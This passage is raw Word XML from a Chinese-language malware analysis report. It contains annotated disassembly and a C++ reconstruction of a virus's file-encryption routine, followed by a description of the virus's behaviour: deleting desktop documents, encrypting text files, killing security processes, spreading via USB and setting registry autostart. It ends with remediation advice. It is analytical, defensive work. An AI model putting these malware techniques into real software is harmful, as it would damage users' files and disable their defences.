xml:space="preserve">.text:00403BFD                 add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为待加密数组的第二个元素地址，另待加密数组为C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.text:00403BFF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byte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为c[i+1]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.text:00403C02                 test    al, al          ; 是否为结束符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.text:00403C04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jz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short loc_403C62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.text:00403C06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[ebp-1Ch]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.text:00403C09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[eax+1]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 c[1]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.text:00403C0C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[ebp+0Ch]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.text:00403C0F                 add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 c[1+i]的地址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.text:00403C11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byte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 c[1+i]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.text:00403C14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movsx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al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.text:00403C17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byte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[ebp-21h]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为t1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.text:00403C1B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byte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[ebp+eax-52h]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为mod[t1]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.text:00403C20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al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.text:00403C23                 and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c[i+1]&amp;mod[t1]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.text:00403C25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byte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[ebp-22h]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为t2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.text:00403C29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byte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[ebp+eax-52h]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为mod[t2]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.text:00403C2E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xor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al, [ebp-1Fh]   ; </w:t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>k3^mod[t2]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.text:00403C31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al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.text:00403C34                 add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26h        ; k3^mod[t2]+0x26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.text:00403C37                 and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16h        ; (k3^mod[t2]+0x26)&amp;0x16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.text:00403C3A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.text:00403C3C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xor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((c[i+1]&amp;mod[t1])^0x26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.text:00403C3E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0E6C2B449h ; 以下是求模操作，操作数是0x47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.text:00403C43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.text:00403C45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imul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.text:00403C47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edx+ecx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.text:00403C4A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6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.text:00403C4D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.text:00403C4F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.text:00403C51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1Fh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.text:00403C54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.text:00403C56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.text:00403C58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imul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47h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.text:00403C5B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.text:00403C5D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>.text:00403C5F                 mov     [ebp-1Eh], al   ; 求模结束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.text:00403C62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.text:00403C62 loc_403C62:                             ; CODE XREF: .text:00403C04↑j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.text:00403C62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[ebp-1Ch]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 xml:space="preserve">.text:00403C65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[eax+2]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为c[2]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.text:00403C68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[ebp+0Ch]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.text:00403C6B                 add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.text:00403C6D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byte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为c[i+2]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.text:00403C70                 test    al, al          ; 是否为结束符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.text:00403C72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jz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loc_403D32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.text:00403C78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[ebp-1Ch]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.text:00403C7B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[eax+2]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.text:00403C7E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[ebp+0Ch]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.text:00403C81                 add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.text:00403C83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byte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为c[i+2]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.text:00403C86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movsx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ebx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al        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ebx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为c[i+2]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.text:00403C89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byte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[ebp-21h]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为t1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.text:00403C8D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[eax+8]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为t1+8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.text:00403C90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66666667h  ; 求模操作，求模操作数为0x14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.text:00403C95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.text:00403C97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imul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.text:00403C99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3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.text:00403C9C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.text:00403C9E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1Fh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 xml:space="preserve">.text:00403CA1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.text:00403CA3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.text:00403CA5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shl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2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.text:00403CA8                 add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.text:00403CAA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shl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2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.text:00403CAD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.text:00403CAF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为(t1+8)%0x14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.text:00403CB1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byte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[ebp+edx-52h]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为mod[(t1+8)%0x14]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.text:00403CB6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al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.text:00403CB9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esi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ebx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esi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为mod[(t1+8)%0x14]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.text:00403CBB                 and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esi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esi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为c[i+2]&amp;mod[(t1+8)%0x14]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.text:00403CBD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ebx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byte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[ebp-1Eh]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ebx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为k2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.text:00403CC1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byte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[ebp-22h]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为t2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.text:00403CC5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[eax+4]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为t2+4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.text:00403CC8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66666667h  ; 求模操作，求模操作数为0x14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.text:00403CCD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.text:00403CCF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imul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.text:00403CD1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3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.text:00403CD4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.text:00403CD6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1Fh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.text:00403CD9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 xml:space="preserve">.text:00403CDB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.text:00403CDD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shl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2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.text:00403CE0                 add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.text:00403CE2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shl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2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.text:00403CE5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.text:00403CE7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为(t2+4)%0x14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.text:00403CE9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byte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[ebp+edx-52h]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为mod[(t2+4)%0x14]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.text:00403CEE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xor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al, [ebp-1Fh]   ; al为k3^mod[(t2+4)%0x14]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.text:00403CF1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al        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为k3^mod[(t2+4)%0x14]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.text:00403CF4                 add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ebx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.text:00403CF6                 and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99h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为k3^mod[(t2+4)%0x14])&amp;0x99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.text:00403CFB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xor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esi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.text:00403CFD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esi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.text:00403CFF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88888889h  ; 求模操作，求模操作数为0x78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.text:00403D04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.text:00403D06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imul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.text:00403D08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edx+ecx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.text:00403D0B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6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.text:00403D0E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.text:00403D10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.text:00403D12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1Fh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.text:00403D15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.text:00403D17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 xml:space="preserve">.text:00403D19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.text:00403D1B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ds:0[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*8]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.text:00403D22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.text:00403D24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.text:00403D26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shl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4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.text:00403D29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.text:00403D2B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.text:00403D2D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为(k3^mod[(t2+4)%0x14])&amp;0x99)%0x78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.text:00403D2F                 mov     [ebp-1Fh], al   ; k3=(k3^mod[(t2+4)%0x14])&amp;0x99)%0x78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.text:00403D32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.text:00403D32 loc_403D32:                             ; CODE XREF: .text:00403C72↑j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.text:00403D32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[ebp-1Ch]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.text:00403D35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[eax+3]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.text:00403D38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[ebp+0Ch]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.text:00403D3B                 add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为c[i+3]地址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.text:00403D3D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byte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为c[i+3]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.text:00403D40                 test    al, al          ; 是否为结束符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.text:00403D42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jz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loc_403DF1      ; 变量d为0x100000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.text:00403D48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[ebp-1Ch]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.text:00403D4B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[eax+3]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.text:00403D4E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[ebp+0Ch]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.text:00403D51                 add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lastRenderedPageBreak/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为c[i+3]地址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.text:00403D53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byte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为c[i+3]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.text:00403D56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movsx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ebx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al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.text:00403D59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byte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[ebp-21h]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为t1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.text:00403D5D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[eax+0Ah]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为t1+10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.text:00403D60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66666667h  ; 求模操作，求模操作数为0x14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.text:00403D65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.text:00403D67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imul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.text:00403D69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3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.text:00403D6C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.text:00403D6E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1Fh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.text:00403D71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.text:00403D73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.text:00403D75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shl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2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.text:00403D78                 add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.text:00403D7A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shl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2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.text:00403D7D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.text:00403D7F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为(t1+10)%0x14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.text:00403D81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byte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[ebp+edx-52h]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为mod[(t1+10)%0x14]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.text:00403D86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al        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为mod[(t1+10)%0x14]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.text:00403D89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esi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ebx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esi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为c[i+3]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 xml:space="preserve">.text:00403D8B                 and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esi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esi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为c[i+3]&amp;mod[(t1+10)%0x14]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.text:00403D8D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ebx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byte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[ebp-1Fh]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ebx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为k4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.text:00403D91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byte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[ebp-22h]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为t2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.text:00403D95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[eax+0Ch]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为t2+12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.text:00403D98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66666667h  ; 求模操作，求模操作数为0x14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.text:00403D9D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为(t2+12)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.text:00403D9F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imul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.text:00403DA1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3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.text:00403DA4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.text:00403DA6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1Fh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.text:00403DA9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.text:00403DAB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.text:00403DAD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shl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2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.text:00403DB0                 add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.text:00403DB2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shl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2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.text:00403DB5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.text:00403DB7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为(t2+12)%0x14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.text:00403DB9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byte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[ebp+edx-52h]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为mod[(t2+12)%0x14]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.text:00403DBE                 and     al, [ebp-20h]   ; k4&amp;mod[(t2+12)%0x14]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.text:00403DC1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al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 xml:space="preserve">.text:00403DC4                 add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ebx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为(c[i+3]&amp;mod[(t1+10)%0x14])^k3+(k4&amp;mod[(t2+12)%0x14])&amp;0x16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.text:00403DC6                 and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16h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.text:00403DC9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xor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esi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.text:00403DCB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esi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.text:00403DCD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66666667h  ; 求模操作，求模操作数为0x14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.text:00403DD2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.text:00403DD4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imul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.text:00403DD6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3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.text:00403DD9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.text:00403DDB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1Fh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.text:00403DDE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.text:00403DE0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.text:00403DE2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shl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2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.text:00403DE5                 add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.text:00403DE7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shl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2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.text:00403DEA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.text:00403DEC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为((c[i+3]&amp;mod[(t1+10)%0x14])^k3+(k4&amp;mod[(t2+12)%0x14])&amp;0x16)%0x14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.text:00403DEE                 mov     [ebp-20h], dl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.text:00403DF1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.text:00403DF1 loc_403DF1:                             ; CODE XREF: .text:00403D42↑j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.text:00403DF1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dword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[ebp-28h], 100000h ; 变量d为0x100000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.text:00403DF8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byte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[ebp-1Dh]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为k1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 xml:space="preserve">.text:00403DFC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shl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8          ; k1&lt;&lt;0x8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.text:00403DFF                 mov     [ebp-2Ch],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; 变量k11为k1&lt;&lt;0x8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.text:00403E02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byte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[ebp-1Eh]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为k2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.text:00403E06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shl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10h        ; k2&lt;&lt;0x10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.text:00403E09                 mov     [ebp-30h],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; 变量k12为k2&lt;&lt;0x10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.text:00403E0C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byte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[ebp-1Fh]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为k3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.text:00403E10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shl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18h        ; k3&lt;&lt;0x18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.text:00403E13                 mov     [ebp-34h],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; 变量k13为k2&lt;&lt;0x18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.text:00403E16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byte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[ebp-20h]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为k4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.text:00403E1A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shl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18h        ; k4&lt;&lt;0x18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.text:00403E1D                 mov     [ebp-38h],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; 变量k14为k4&lt;&lt;0x18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.text:00403E20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[ebp-2Ch]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为k11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.text:00403E23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[ebp-30h]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为k12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.text:00403E26                 add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k11+k12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.text:00403E28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[ebp-34h]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lastRenderedPageBreak/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为k13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.text:00403E2B                 add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k11+k12+k13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.text:00403E2D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[ebp-38h]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为k14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.text:00403E30                 add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为k11+k12+k13+k14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.text:00403E32                 add     [ebp-28h],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; d+=k11+k12+k13+k14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.text:00403E35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byte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[ebp-23h]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为t3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.text:00403E39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dword_4BE020[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*4]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为ARR[t3]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.text:00403E40                 and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[ebp-28h]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d&amp;ARR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[t3]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.text:00403E43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ebx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.text:00403E45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byte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[ebp-23h]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为t3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.text:00403E49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[eax+60h]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为t3+96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.text:00403E4C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80808081h  ; 求模操作，操作数为0xff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.text:00403E51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.text:00403E53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imul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.text:00403E55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edx+ecx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.text:00403E58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7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.text:00403E5B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.text:00403E5D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.text:00403E5F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1Fh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 xml:space="preserve">.text:00403E62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.text:00403E64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.text:00403E66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.text:00403E68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shl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8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.text:00403E6B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.text:00403E6D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.text:00403E6F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为(t3+96)%0xff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.text:00403E71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dword_4BE020[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*4]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为ARR[(t3+96)%0xff]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.text:00403E78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xor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ebx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ebx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为(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d&amp;ARR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[t3])^ARR[(t3+96)%0xff]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.text:00403E7A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movzx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byte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[ebp-23h]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为t3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.text:00403E7E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[eax+2Dh]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为(t3+45)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.text:00403E81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80808081h  ; 求模操作，操作数为0xff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.text:00403E86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.text:00403E88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imul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.text:00403E8A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edx+ecx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.text:00403E8D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7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.text:00403E90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.text:00403E92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.text:00403E94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sar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1Fh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.text:00403E97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.text:00403E99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.text:00403E9B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.text:00403E9D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shl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8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 xml:space="preserve">.text:00403EA0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.text:00403EA2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ecx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.text:00403EA4                 sub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为(t3+45)%0xff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.text:00403EA6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dword_4BE020[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*4] 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为ARR[(t3+45)%0xff]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.text:00403EAD         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xor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ebx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为(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d&amp;ARR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[t3])^ARR[(t3+96)%0xff]^ARR[(t3+45)%0xff]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.text:00403EAF                 mov     [ebp-3Ch],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; 变量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new_d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为(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d&amp;ARR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[t3])^ARR[(t3+96)%0xff]^ARR[(t3+45)%0xff]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.text:00403EB2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[ebp-3Ch]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.text:00403EB5               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dword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ptr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[esp+8], 0Ah ; Radix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.text:00403EBD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[ebp-94h]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.text:00403EC3                 mov     [esp+4],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;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DstBuf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br/>
        <w:t>.text:00403EC7                 mov     [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esp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],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; Val</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>.text:00403ECA                 call    _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itoa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          ; 调用函数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itoa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，把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new_d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转换成字符串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.text:00403ECF                 lea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[ebp-3Dh]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  <w:t>随后根据上面分析的算法，再现文件加密算法：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string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encrycode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(char *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c,int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 xml:space="preserve">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len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)</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>    byte mod[20]= {0x45,0x89,0x41,0x80,0x42,0x59,0x15,0x46,0x19,0x82,0x10,0x20,0x87,0x45,0x32,0x65,0x55,0x11,0x22,0x33};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srand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((unsigned int)time(NULL));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 xml:space="preserve">    int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=0;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   string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strbuf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="";</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>    while(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&lt;(len-1)/4+1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>    {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byte k1=0x35;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byte k2=0x25;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byte k3=0x45;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byte k4=0x55;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byte t1=rand()%0x14;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byte t2=rand()%0x14;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byte t3=rand()%0xff;</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> 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edx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[ebp-1Ch]  ; [ebp-1Ch]为待加密数组的最后元素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 mov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eax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, [ebp+0Ch]  ; [ebp+0Ch]为待加密数组的第一个元素</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> 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if(c[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]!='\0')；[ebp+0Ch]为待加密数组的第一个元素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    k1=(((0x74&amp;mod[t2])^0x39+(k2|mod[t1])&amp;k1)%0xf1)%0xee;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if(c[i+1]!='\0')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    k2=((c[i+1]&amp;mod[t1])^0x26+(k3^mod[t2])&amp;0x16)%0x47;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if(c[i+2]!='\0')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    k3=((c[i+2]&amp;mod[(t1+8)%0x14])^k2+(k3^mod[(t2+4)%0x14])&amp;0x99)%0x78;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if(c[i+3]!='\0')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    k4=((c[i+3]&amp;mod[(t1+10)%0x14])^k3+(k4&amp;mod[(t2+12)%0x14])&amp;0x16)%0x14;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DWORD d=0x100000;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DWORD k11=k1&lt;&lt;0x8;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DWORD k12=k2&lt;&lt;0x10;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>        DWORD k13=k3&lt;&lt;0x18;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DWORD k14=k4&lt;&lt;0x18;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d+=k11+k12+k13+k14;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       DWORD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new_d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=(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d&amp;ARR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[t3])^ARR[(t3+96)%0xff]^ARR[(t3+45)%0xff];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char c[40];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itoa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(new_d,c,10);</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>        string s=c;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strbuf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+=s;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      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++;</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>    }</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    return 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strbuf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;</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>}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  <w:t>2.恶意行为分析</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>1.OD加载病毒，可以看到三个全局变量，分别为病毒名和自启动文件名，用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ida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分析病毒的恶意行为，先看</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>winproc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>函数，可以看到几个恶意函数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427B005E" wp14:editId="1E0E2266">
            <wp:extent cx="4831080" cy="144780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03C9E5CD" wp14:editId="1DD83799">
            <wp:extent cx="5274310" cy="40589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7381A02B" wp14:editId="1BB133E7">
            <wp:extent cx="5274310" cy="42316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br/>
        <w:t>2.当发送窗口新建信息时，程序获取病毒自身路径和桌面路径，随后删除桌面上的doc文件和docx文件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4EEA8263" wp14:editId="711DE5ED">
            <wp:extent cx="5274310" cy="39135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1598F80B" wp14:editId="3B92114E">
            <wp:extent cx="5274310" cy="26682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  <w:t>3.接着对txt文件进行加密处理，加密的时候先读取txt文件内容，然后进行加密，加密后写入加密后的内容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28707CF0" wp14:editId="0ADC2071">
            <wp:extent cx="5274310" cy="6680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  <w:t>4.接着杀死某些调式类进程和安全进程，但无法杀死管理员权限下运行的进程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7E75CCD7" wp14:editId="5A359A05">
            <wp:extent cx="5113020" cy="4191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08404327" wp14:editId="5EFD36C0">
            <wp:extent cx="5274310" cy="38493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245CEA23" wp14:editId="507D5130">
            <wp:extent cx="5274310" cy="44640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  <w:t>5.在桌面上制造垃圾，先是新建然后往里面写入内容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1B8F18AF" wp14:editId="3707A130">
            <wp:extent cx="5274310" cy="51428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4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  <w:t>6.当系统盘上的病毒运行时，则会检测是否插入U盘，插入的话，则把病毒拷到U盘中，否则把病毒拷到系统盘中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5BB2AE7D" wp14:editId="1C61A543">
            <wp:extent cx="5274310" cy="19748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70DCE519" wp14:editId="30D116D9">
            <wp:extent cx="5274310" cy="34817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  <w:t>7.当把病毒拷到系统盘时，设置注册表值，另其自启动，接着判断病毒是否运行，如果没有，则运行病毒</w:t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/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="654DDB4D" wp14:editId="51114C28">
            <wp:extent cx="5274310" cy="33000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br/>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>解决方案：</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>1.删除注册表中，自启动的内容，删除自启动文件，恶意软件，使用磁盘文件修复软件修复已删除文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>2.养成对桌面文件进行备注的习惯。</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>3.删除系统盘中的病毒文件或者修改该病毒的文件名，经分析发现，修改该病毒的文件名可以防止该病毒拷贝到系统盘中</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>4.不要下载不知名的软件，或者浏览一些不知名的网站。</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>5.分析我在上面写的文件加密算法，写出文件的解密算法。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00333F90" w:rsidRPr="00A166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D4F756" w14:textId="77777777" w:rsidR="009129FE" w:rsidRDefault="009129FE" w:rsidP="00A048C5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5770E432" w14:textId="77777777" w:rsidR="009129FE" w:rsidRDefault="009129FE" w:rsidP="00A048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7366AE" w14:textId="77777777" w:rsidR="009129FE" w:rsidRDefault="009129FE" w:rsidP="00A048C5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="388CBE76" w14:textId="77777777" w:rsidR="009129FE" w:rsidRDefault="009129FE" w:rsidP="00A048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AB7CCB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="78D2A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131D48"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FBCC8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0B7464"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BDC4A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306B9B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F3E07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507E96"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="77507E9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04413944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90525204">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="154146600">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="414519857">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="6364477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585"/>
    <w:rsid w:val="00140962"/>
    <w:rsid w:val="001A42C9"/>
    <w:rsid w:val="001E557C"/>
    <w:rsid w:val="001F1FC0"/>
    <w:rsid w:val="00223256"/>
    <w:rsid w:val="00333F90"/>
    <w:rsid w:val="003D0E3C"/>
    <w:rsid w:val="00495E99"/>
    <w:rsid w:val="004B686C"/>
    <w:rsid w:val="004E18EB"/>
    <w:rsid w:val="004F460F"/>
    <w:rsid w:val="00550D69"/>
    <w:rsid w:val="006116D1"/>
    <w:rsid w:val="00720076"/>
    <w:rsid w:val="009129FE"/>
    <w:rsid w:val="00A048C5"/>
    <w:rsid w:val="00A05C04"/>
    <w:rsid w:val="00A16628"/>
    <w:rsid w:val="00AB6A0D"/>
    <w:rsid w:val="00B12D0A"/>
    <w:rsid w:val="00B91828"/>
    <w:rsid w:val="00CD5422"/>
    <w:rsid w:val="00D8328A"/>
    <w:rsid w:val="00DB21F3"/>
    <w:rsid w:val="00DC29B7"/>
    <w:rsid w:val="00E94585"/>
    <w:rsid w:val="00F9271C"/>
    <w:rsid w:val="00FC2AA6"/>
    <w:rsid w:val="00FF7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5EA23E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{563CE148-EA67-4CF5-8EA1-9BD4020C0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48C5"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="20"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00A048C5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271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048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048C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048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048C5"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00A048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9271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Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00333F9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33F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00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73</Pages>
  <Words>7007</Words>
  <Characters>39945</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>332</Lines>
  <Paragraphs>93</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>46859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san</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>zhang san</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-20T02:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-21T00:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>